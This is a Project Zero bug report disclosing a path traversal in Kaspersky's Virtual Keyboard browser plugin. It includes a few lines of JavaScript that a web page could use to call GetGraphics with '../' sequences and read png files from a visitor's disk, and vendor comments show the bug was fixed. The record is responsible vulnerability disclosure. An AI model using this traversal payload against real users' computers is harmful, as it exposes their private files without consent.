532 - Kaspersky Antivirus Virtual Keyboard GetGraphics() Path Traversal - project-zero

Starred by 2 users

Status:	Fixed
Owner:	taviso@google.com
Closed:	Dec 2015
Cc:	project-...@google.com
Product-Kaspersky Deadline-90 Severity-moderate Finder-taviso Vendor-Kaspersky CCProjectZeroMembers Reported-2015-Sep-14

Kaspersky Antivirus Virtual Keyboard GetGraphics() Path Traversal

Project Member Reported by taviso@google.com, Sep 14 2015

Back to list

There is an obvious path traversal in Kaspersky Virtual Keyboard, a hosting website can simply do element.GetGraphics("../../../../whatever") to read any png file on the victims computer.

x = document.createElement("object")
x.type=window.navigator.plugins["Virtual Keyboard KAV"][0].type
document.body.appendChild(x)
x.LinkPluginWithFirefoxExtention('0007BF21-E04A-A741-B059-6A6DB0324A41')
x.GetGraphics('../../../../../../../../../whatever')

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Project Member Comment 1 by taviso@google.com, Sep 18 2015

This issue wasn't as simple as I thought, Kaspersky informed me that I misunderstood how it worked and I agreed with their assessment.

However, based on their description I pointed out a different (less severe) attack, and they agreed to fix that instead:



Hi Tavis,
 
We will fix the issue that unprivileged user can get access to any png file on disk C using Virtual Keyboard path traversal. We kindly request 90-days period to release a fix for it.
 
Best regards,
Igor

Project Member Comment 2 by taviso@google.com, Dec 10 2015

Labels: -Severity-high Severity-moderate
Status: Fixed

This issue was resolved.

Project Member Comment 3 by taviso@google.com, Dec 10 2015

Labels: -Restrict-View-Commit

► Sign in to add a comment